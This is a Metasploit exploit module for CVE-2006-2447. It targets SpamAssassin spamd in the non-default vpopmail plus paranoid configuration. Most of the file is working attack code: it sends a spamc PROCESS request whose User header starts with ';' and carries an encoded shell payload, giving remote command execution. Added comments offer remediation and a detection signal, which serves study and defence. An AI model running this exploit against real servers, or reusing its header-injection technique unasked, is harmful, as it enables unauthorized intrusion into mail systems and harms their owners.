
SpamAssassin spamd 3.1.3 Command Injection

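##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Metasploit module for CVE-2006-2447, a command injection in the
# SpamAssassin spamd daemon.
#
# Scope, as stated in the module description: only spamd instances running
# with both vpopmail and paranoid modes enabled (a non-default combination;
# these correspond to spamd's -v/--vpopmail and -P/--paranoid options) are
# affected, and only in versions prior to v3.1.3. Release 3.1.3 itself is the
# fixed version, despite the wording of some titles given to this listing.
#
# Notes for defenders:
# * Remediation is upgrading spamd to a fixed release; see the advisory URL
#   in 'References'.
# * spamd (default port 783, see register_options) is meant to serve local or
#   trusted spamc clients; it should not be reachable from untrusted networks.
# * The request built in #exploit carries a "User:" header whose value starts
#   with ';'. A spamc User header containing shell metacharacters is not a
#   legitimate username and is a usable detection signal in spamd logs or on
#   the wire.
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (name, references, payload constraints,
  # target list) and the default remote port.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SpamAssassin spamd Remote Command Execution',
      'Description'    => %q{
          This module exploits a flaw in the SpamAssassin spamd service by specifying
          a malicious vpopmail User header, when running with vpopmail and paranoid
          modes enabled (non-default). Versions prior to v3.1.3 are vulnerable
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2006-2447' ],
          [ 'OSVDB', '26177' ],
          [ 'BID', '18290' ],
          [ 'URL', 'http://spamassassin.apache.org/advisories/cve-2006-2447.txt' ],
        ],
      'Privileged'     => false,
      # The injected data is a shell command string, not machine code:
      # ARCH_CMD / 'cmd' payloads only, no NOP sled, at most 1024 bytes.
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby bash telnet',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic', { }],
        ],
      'DisclosureDate' => 'Jun 06 2006',
      'DefaultTarget'  => 0))

    # 783/tcp is the port this module assumes spamd listens on by default.
    register_options(
      [
        Opt::RPORT(783)
      ], self.class)
  end

  # Sends one spamc-protocol PROCESS request whose User header carries the
  # command payload, then hands control to the framework's payload handler.
  #
  # The module performs no version or configuration check before sending, so
  # a response (or lack of one) says nothing reliable about whether a host
  # is patched; confirm the installed spamd version and startup options
  # directly when assessing exposure.
  def exploit
    connect

    # Filler message body: 20 random letters, so the request is well-formed.
    content = Rex::Text.rand_text_alpha(20)

    sploit = "PROCESS SPAMC/1.2\r\n"
    # Declared length is the body plus one CRLF.
    sploit << "Content-length: #{(content.length + 2)}\r\n"
    # The User header value is fully client-controlled. The leading ';' is a
    # shell command separator: per the referenced advisory, a vulnerable
    # spamd in vpopmail + paranoid mode lets this value reach a shell command
    # line during the vpopmail user lookup.
    sploit << "User: ;#{payload.encoded}\r\n\r\n"
    sploit << content + "\r\n\r\n"

    sock.put(sploit)

    handler
    disconnect
  end

end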




patrick                                                                           06/06/2006

				